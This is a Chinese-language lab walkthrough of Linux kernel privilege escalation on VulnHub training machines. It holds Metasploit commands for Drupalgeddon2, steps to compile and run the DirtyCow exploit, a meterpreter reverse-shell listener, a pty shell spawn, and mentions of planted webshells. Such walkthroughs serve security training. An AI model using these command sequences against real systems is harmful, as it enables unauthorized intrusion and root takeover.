Linux权限提升-内核溢出

一：Web到Linux-内核溢出Dcow

复现环境：https://www.vulnhub.com/entry/lampiao-1,249/

1.信息收集：探测⽬标ip及开发端⼝

2.Web漏洞利⽤：

查找drupal相关漏洞
search drupal
# 进⾏漏洞利⽤
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.   .  
set rport 1898
run

3.内核提权：

# 上传内核漏洞检测脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
# 进⼊shell，并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh

 https://github.com/gbonacini/CVE-2016-5195

4.发现提权漏洞，上传提权利⽤程序dcow.cpp到服务器
 exit
 upload /root/dcow.cpp /tmp/dcow.cpp 

5. 编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls
# 由于本身的终端问题，所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
# 漏洞利⽤成功后使⽤root⽤户密码dirtyCowFun进⾏登录即可
su root
whoami

二：Web到Linux-内核溢出Pwnkit 

复现环境：https://www.vulnhub.com/entry/darkhole-1,724/

1.信息收集：探测⽬标ip及开发端⼝

2.Web漏洞利⽤：

重置管理密码，注册新账号，使⽤注册⽤户登录，并重置密码，

使用Bp抓包进行修改管理员密码进入后台 ，上传一句话木马进入

3. 反弹MSF

将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

4.启动msf
└─# msfdb run
# 监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666（端口自己设置）
run

5.内核提权

通过xftp8上传两个文件linux-exploit-suggester.sh      linpeas.sh

进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh

运行两个文件

 查找漏洞利⽤模块  使⽤提权漏洞利⽤模块   在获取的shell中查看当前⽤户权限

Web到Linux-内核溢出-DirtyPipe

复现环境：https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ 

1.信息收集：

2.Web漏洞利⽤

 ⽬录扫描  dirb  http://192.168.   . 

访问http://192.168.   .   /graffiti.php进⾏功能测试并抓包

3. 写⼊⼀句话⽊⻢发送恶意代码，并使⽤哥斯拉连接

4. 反弹MSF

5. 内核提权

上传提权内核漏洞检测辅助脚本

进⼊shell进⾏提权漏洞检测
shell
cd /tmp
chmod +x 1.sh
./1.sh